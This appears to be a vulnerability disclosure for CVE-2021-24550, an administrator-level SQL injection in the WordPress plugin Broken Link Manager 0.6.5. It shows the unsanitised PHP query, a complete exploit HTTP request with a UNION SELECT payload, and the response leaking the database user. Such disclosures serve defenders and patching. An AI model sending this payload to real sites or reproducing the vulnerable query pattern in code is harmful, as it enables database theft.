Wp Plugin Broken Link Manager

Plugin Details

Plugin Name: wp-plugin : broken-link-manager
Effected Version : 0.6.5 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24550
Identified by : Shreya Pohekar
WPScan Reference URL

Disclosure Timeline

Technical Details

The edit URL functionality in the plugin makes a get request to fetch the url. The GET parameter url is not sanitised, escaped or validated before inserting to a SQL statement, leading to SQL injection.

Vulnerable Code: wblm-url-edit.php#L4

2:$url = $_GET['url'];
3:global $wpdb;
4:$urlInfo = $wpdb->get_row("SELECT * FROM " . TABLE_WBLM . " where id = $url");

PoC Screenshot

broken-link-manager-poc

broken-link-manager-poc-1

Exploit

GET /wp-admin/admin.php?page=wblm-edit-url&url=-4966 UNION ALL SELECT NULL,CONCAT(0x7178707071,0x5753787a67454c546c6e6d66756c705351734975516a636f6a5a615966724c627247697646625768,0x717a7a7171),current_user(),NULL,NULL,NULL,NULL-- - HTTP/1.1
Host: 172.28.128.50
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/admin.php?page=wblm-redirect
Accept-Language: en-US,en;q=0.9
Cookie: spf-last-metabox-tab-12-_sptp_generator=_sptp_generator_1; spf-last-metabox-tab-14-_sptp_generator=_sptp_generator_1; wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1619784669%7CqTnNMQIcB6qyLJ4wbLSDz4TgZNqTVBscu1jNj8pFlfl%7Ce8b173e02d87095d6cd04209dbfeda32a85a82d72b684e5e4db9e8da3c25c610; __eucookielaw=true; _ga=GA1.1.436418670.1617784311; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1619288085; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1619784669%7CqTnNMQIcB6qyLJ4wbLSDz4TgZNqTVBscu1jNj8pFlfl%7Cb4cc1181f3020f37b67c5d7020c67fffbd647bfa363a2f07198baf1189be58db; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist; wp-settings-time-1=1619611876; ignored_html_tags=1; manage_settings=1
Connection: close

Response

name="url" value="-4966 UNION ALL SELECT NULL,CONCAT(0x7178707071,0x5753787a67454c546c6e6d66756c705351734975516a636f6a5a615966724c627247697646625768,0x717a7a7171),current_user(),NULL,NULL,NULL,NULL-- -">
							<div class="form-group">
								<label for="inputEmail3" class="col-sm-1 control-label">Old Url</label>
								<div class="col-sm-8">
									<input type="text" class="form-control" id="old_url" name="old_url" placeholder="http://" value="qxppqWSxzgELTlnmfulpSQsIuQjcojZaYfrLbrGivFbWhqzzqq">
								</div>
							</div>
							<div class="form-group">
								<label for="inputPassword3" class="col-sm-1 control-label">New Url </label>
								<div class="col-sm-8">
									<input type="text" class="form-control" id="new_url" name="new_url" placeholder="http://" value="bob@localhost">
							</div>
						</div>
					</div>
					<!-- form-horizontal -->   
				</div>
				<!-- /.panel-body -->
			</div>